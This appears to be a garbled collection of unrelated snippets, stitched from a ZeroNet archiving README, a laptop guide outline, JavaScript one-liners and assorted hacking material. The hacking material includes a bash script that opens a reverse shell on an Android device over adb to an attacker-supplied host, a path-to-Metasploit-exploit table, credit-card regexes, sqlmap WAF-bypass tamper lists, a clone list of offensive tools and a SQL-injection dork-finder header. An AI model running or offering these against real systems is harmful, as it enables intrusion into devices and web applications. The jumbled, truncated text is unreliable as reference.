0m3rta13

ZeroArchive

Automatic mirroring of websites to ZeroNet.

Requirements

You have to install Python 3, ZeroNet and HTTrack on your computer.

You also have to create new empty ZeroNet site which will be used as archive destination. It's recommended that you use one ZeroNet site for each URL you want to archive.

Reddit post (Archived)

Table of Content

What to expect?
- Some TLDR about the idea behind
Prerequisites
- Hardware
- System & Software
Update: Attention for MUXless laptop

	/soap/	exploits/freebsd/misc/citrix_netscaler_soap_bof
	/glpi/	exploits/multi/http/glpi_install_rce
	/invoker/JMXInvokerServlet/	exploits/multi/http/jboss_invoke_deploy
	/moodle/	exploits/multi/http/moodle_cmd_exec
	/console/	exploits/multi/http/werkzeug_debug_rce
	/SiteScope/	exploits/multi/http/hp_sitescope_issuesiebelcmd
	/phpwiki/	exploits/multi/http/phpwiki_ploticus_exec
	/cuteflow_v.2.11.2/	exploits/multi/http/cuteflow_upload_exec
	/phpmyadmin/	exploits/multi/http/phpmyadmin_preg_replace
	/blank-struts2/login.action/	exploits/multi/http/struts_code_exec_parameters

Credit Card Regex

Amex Card: ^3[47][0-9]{13}$
BCGlobal: ^(6541|6556)[0-9]{12}$
Carte Blanche Card: ^389[0-9]{11}$
Diners Club Card: ^3(?:0[0-5]|[68][0-9])[0-9]{11}$
Discover Card: ^65[4-9][0-9]{13}|64[4-9][0-9]{13}|6011[0-9]{12}|(622(?:12[6-9]|1[3-9][0-9]|[2-8][0-9][0-9]|9[01][0-9]|92[0-5])[0-9]{10})$
Insta Payment Card: ^63[7-9][0-9]{13}$
JCB Card: ^(?:2131|1800|35\d{3})\d{11}$
KoreanLocalCard: ^9[0-9]{15}$

	// Inspired by https://twitter.com/coderitual/status/1112297299307384833 and https://tapajyoti-bose.medium.com/7-killer-one-liners-in-javascript-33db6798f5bf

	// Remove any duplicates from an array of primitives.
	const unique = [...new Set(arr)]

	// Sleep in async functions. Use: await sleep(2000).
	const sleep = (ms) => (new Promise(resolve => setTimeout(resolve, ms)));
	// or
	const sleep = util.promisify(setTimeout);

	#!/bin/bash
	# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
	# By Random_Robbie
	adb connect $1:5555
	adb shell sh -i >& /dev/tcp/$2/4444 0>&1
	echo "[] Should have a shell now ..... Be nice :) []"

	#!/bin/bash
	cd /opt/
	a=`cat <<-EOF
	https://github.com/CyberArkLabs/ACLight
	https://github.com/EtixLabs/cameradar
	https://github.com/UltimateHackers/XSStrike
	https://github.com/peterpt/eternal_scanner
	https://github.com/kgretzky/evilginx
	https://github.com/1N3/Findsploit
	https://github.com/fuzzbunch/fuzzbunch

	# All scripts
	```
	--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
	```
	# General scripts
	```
	--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
	```
	# Microsoft access
	```

	"""

	*** Auto-finder by dorks tool with Google API & Bing API ***

	@author: z0rtecx
	@release date: dec-2014
	@version: 1.0.12122014
	@poc: good dork for find web pages whit SQLi vulnerability in ID parameter, e.g. "inurl:details.php?id="
	@description: This tool is for save time for you. It is gathering dorks of a txt file, and search potential web pages with SQLi vulnerability. ONLY FOR MySQL errors.
	@features: